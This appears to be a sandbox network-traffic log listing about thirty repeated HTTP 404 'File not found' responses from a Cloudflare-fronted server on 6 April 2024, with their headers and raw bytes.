Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uY9vyZJlJrx0YuVyMjrl9i0JcBqDvgucGJt1HYud3nfSBXxUHDAp6pBOMNtzEJ43cLaYOKYRotE7xrqFfA%2FAWaOvtb9E9ojlwnIOy%2BgFtqA%2BxaNf1CNi%2B41s1FjzZNXG8A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700131b8c582257-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ia3qjY4I0NDb1ZYV7qdQsSHfIByuNN6DLRJhmndTGSRVsJya65QxFzbEkbPwI1zweOLLWiCnUMwhYNEHBflLWaP0B4S1FOjmtXa1AOsLLN8PO%2BHwQju6%2BVkuXAVpeujUKA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013206bea5c79-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zA5YwEC8tHXW4D0jTjw8734u8oqqER7c0u5tmG6iK6RjFGDY1ecwy45QEFwY7bl81H3TT4an64hIZjSfWjgUiO5MWDy5qwGeLb9Kp5B3XnZmlSQ8vrwBVD9U0l4Oi%2FCkYw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001325395e4c1b-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hD6NcVAhFU0rSXAm9VnK6XvKyy%2BBNSbye1nX%2FRObdcT%2F2lj8uhCKKQLgS2IT1M38CASB%2BBH9B9YXAB336%2Bd8Aznvx4tBC42IzU%2FU5WhXKFiaNz3UqbrqxEhowHOX5DHvvA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700132a3d4b6dbb-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bmlXRJ%2F5ihBKO45ilZajU4OhuvSUmoB9939Ky3lUk6UlJftKmXy8ljNtNIyA6491G%2BfFXc9Fol2McZg53fWB6GqzbBt3opRu4izJ8C%2B11b9fFn2cQjuxd7O6eMeBAiHEyw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700132f1e075c6f-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vY5GH98lW%2F0OszuKMxmacjI29F8%2BnvmeX%2B07v6j2ICmQPWTOySGByYAAiBenkYxd7nNjJqSPb9vgROQGQfCJqPm%2F1mQ6nvnRERLQJNV1U1NYUSjZYY3h6RDpYs1eJoZYpQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013340e8cb3c1-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gl3VVm1kc8Yhh8U3a9Z97oKKv5Qs9WhPrGtOrgkV%2F6VPMilDIDz0WSmsgCz7ENBx2%2FawTSToARcS2VRGSSRmXfCZ%2Bxg0FnvOGBc6cPU%2BCFpiZIKyBKgwI0JLj4dmi1ygvA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001338cfa7961a-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NUzBx%2BEpxHHepjHv07XDwi%2F2fUx%2FBJooZjHNEfYfcOte%2BGeXQyB8BhzAbjKiuxAYDBh9ocffKa1N1JvOCEocRMWYLDt1dmdyYNUzNYOpTabEeggAOA1Ed2FGLeD9DiegNA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700133daf0509ba-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6g3KaMv5qima7%2BvG7GPiheKGX7wseQs6TNEmDXs6i67wFd91sMBEen2KHJx%2FK%2F9FdT59VwDbgKUb8Ld%2BKSr4zFGNrEFSj28orDFuNxFc0%2BdxN37sGrBlcX1Xf%2F3FkyrJ3w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013428e6f4c16-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6uYNXHeHXbzoIRqn%2BcqvXLoxt6bdvjtWwATNwhNdcBD%2Bk0TtGyE6NXay20dMj6dDX%2FrdaeTNkFXMOVysyMCybf8E1i2fxfyOul0VBG5OQYytfz55dzBbFmYWMQ5YRa8vQA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013478a825c6c-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zl0%2Bmmr3ZrCtRr9useS9N6tkvQs8MSgzROXMwujLYU%2F%2BTN%2FpsPVA%2BtA6ctTfcN48jrdNc2egHZj01xirYTFGDL%2BlfhplrJ2P2bGlMpuJjYRSP3DiVO8Hpl8HxT3kCv3ILg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700134c6e7d742a-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CIpf%2Bnyl%2FqKHdOYLwBniygSqMfR4atIsMTfaD1YLU3Viom85R4Zy%2FXrtD6rAUx8eJMA3rrlXbbqCl1Mfc47VOZVxu9VrcAUhTO8nrZ5UZ5QW7OkT4M4XWzIzlRTSnm%2BISQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013513ea26c88-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9mtUaaRut9HMTDKTnqaOmT4FfLjjCk9Z8AFWsoll9msNC2ftTMRHVynCFgxZyUFvb0GsQVPkyoaZvebQLPH5wX62CZSa6gSlk%2BBzLPVVWfRMjhgMXurKuSuRuBwRDf9J2w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013565bf07441-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XeIHdRYDGzWAM4lm%2FcDBR23ZIBR6Sc%2FFAeVdmeXd4R55B3Vw2Rqm3f81JfR1Wsk2Sf9cXzpmPa%2F3WPOw08C%2Bq8zG1rlXxXwTCiSMlWSA0%2BAClC2ZawN1gUls5OjFHlgnEg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013655b39748e-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lHy%2BnWeke6DX4uCy3gxufoNGkIwFntcPnL0BC6QSPN%2Blu6eyrb%2FigTs3atNr2QkSPT4DY5I%2BcbFkTsURCtT1fvQORwzs4Ty1JMK%2BQliVp7k9FvsPjOfyPgHBctNI1Mwmog%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700136a3ab731da-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WlVQEPP01w%2BHhl%2FIdbZdtvQ9PWlK2k1USYK5QJVY73qHD%2B2Mrm%2FDr0kfVnFI3y2qoZjN%2BV27ygjXrOjwbvT3%2FRCTlW4%2B5SWV7uHonlKj6%2Fg%2FXdmCT7m5lP%2BKJ8DLDoNfCQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700136f1c49961a-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=he0ktgepTM5aiMG%2F%2B8HVehak34wiMUfvZsS%2FXc51PpRRGO4vOz3GE%2FxsnxehKX94BPJIUurrc3NkzAfsKWJUmnNzZ4qNbWhonqn4%2BYpq9zGjQsCO4CUkGxWQ%2B4A%2BuCXtuw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001373fb3b0981-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TVwIgVtUbFiLawufMLwLmYKB6XV3oRTzqg%2BhoV9dAsC6YIUAhbEpzgKgzLn7Lam36juHnInS3M45iAYQoX1hkDxownRWPjMUg4C8sTtvw6JAcQyAmZrbyBZ375Hqqt4lzw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001378e835a566-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ikrCw5e52moUqUbpsFXcakEEl%2B3LGkaAKbTb025ozQtPKquEBKh0XgUj0fX0hYGnGy%2BEHS8BMBjEm56TWnyRtEilrFK%2BxYJ4aMycgEJkr%2FM6pt5ul8Qyce%2FohK9h8h9gkw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700137dbfd28d9d-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=32P4zlhrYGaP0rvDKGdrPXwiSVAgBfCffSfTgJuMs3dAigo%2B4xZpRAPsgncVmu8ayV%2B%2BtQ96%2FNHq8pSf0SEbMufJKOPZh97mY3MyYwkSpYNs%2Bn%2FdXXRhgG60nfb1QrdtfA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013828ead0a32-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wkfBdYBCXOx5P6JOvOf0jDTNu1%2FsBOl6UbSQPYkYcdnLClcrBQozTcZfvLcOT3c8HF2pRCaCosNoGI5e90dOmmgBFRhIdU%2FH2wwRVzJtwq0RVBNccZ%2BP2jECULNN1nt0ag%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013876ecf288a-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=caNV5JMwxkvlHrncxe3uP7JgXeIIpfU8qK3z6lmdkHsqsbdF2XkXIMTnVQ7aQxkL6rk%2FJQEG%2BkU%2FT1qw4PuZv1jsl4IzKJzRy0QyYLHN6Q8J2e2waH78%2FclJofQA1Fv1HQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700138c28d1742a-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S%2FGhWerHES4N4pF5rhJ7F4AxwPyT5JT6qtAB%2BJKSpR8vSx8xEOtrbZ%2B8ozCy87hgbX4VWo%2Bz8S%2FPyH8dmVqQCv22oU%2BIiNLjGCoi82hveMPhQKE8%2FZ3GDuoa0QJdVDbG2A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013912d06dab1-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d6XDMawKld1tn5YSGrAigjhZWleh5uvTxkq8a3Hmys7ZzA0EChV9a6%2Fg5G3THPBmEzmv6Plb1jZXA2lIZZQVPAXISr9G0eoTPwlacfZ5a3v8jLg2SkQhS9W4Rs1hAXldrQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001395fb283347-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F0p44MuOINGEL1NFOgx0i27x%2FYRAx5kNDDkPweOKYfZLJOETodlL3yGNQVD3QOEUGqGusHfGc0R0GcSy3oBgEAwJtbLBJhXqYbNNmJGDCR%2BOncA2C5HgI1muUmS8jpotCw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700139addd0da53-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pu3Ghg%2BD1Ht%2FX8NSoxrraD3BGqFl9hl6W87u7SgNiU2UkgzJkEDZVsRMFu7LO2F7KIxTzw%2F3%2B0eK90K4ECGNqQC%2Bb5hOVmdYxCTbmZJRVAU2BEir4Pl3wjqBrtoN8%2B%2BrBw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700139faecfda4f-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SLeAwqloMsUbKvxI3EKaV88FdN7mAsFsxHs6Zaav1rIVuFtSfGo9M5eWWAhuy%2B9L1u2rTkaE86sDlaCRUQqtu7b7fOoqfHXRbDwIeAYKULnF7ECqexB7RRB5yVfglBLSWw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013a46ffd8dd6-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YrW8bXs0ZBUSnq1fkFmgXpaakc8r8y4A25I2UTmwC3GyyTlqR5pBomCpcm4NHr3XDN7ZkI1AnYjrL6Yr1QE5esT1KP09A9ltjzmHVmnQEaA7PHmkVBRHS6AZ%2FaQYGcEsKA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013a92c184988-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l9RaApPfE6upeyNuSRf6XD%2FH5saBd60MqGlChSRqyE5QZ5N42dz2ZL84pOTOO4hX%2BHxw53fnqRZJf3vDxTKBeJTd%2FvQxVfYNk9hQwojBY%2FnqzAqshfubzxRFdhfsuXq6AA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013adfc826db6-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2HZE5EwbHDpGHOsELggaPbqHTnAwPc82HKJ3dwDsE0cBcPpXZBDGChTThoUJMI28Rq5R4mA65wFnl01RvjZ25JBoVjw1McHIM7RTia%2B4NuijPZXTTNAtOEard7FLQEegBQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013b2a8b9a575-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=InVjmQySneVwFIvcB%2BMKAzADbiRL3UqbqlRAOLUArt2Lk8vxhBbfocB5x7251NqQkPEPfxnfrYb3YJBM332ZxGXtbZqEPJcDKCdLFrCcHIJ2zdVD9yrTXmIDOQK34dAFRA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013b76e134c15-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ydm07zyz%2F9SecHwthypbxWJzD0NhDi%2BhqV6Y3y7guYLov0RPixGzpTOblWWuRmaMehytK14Bce45jceALt%2BMxFH086EZ2tFXgCWU0vBp2e%2BcdJ07w6tlORxWKwKlWwnfgA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013bc4f1d8da6-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
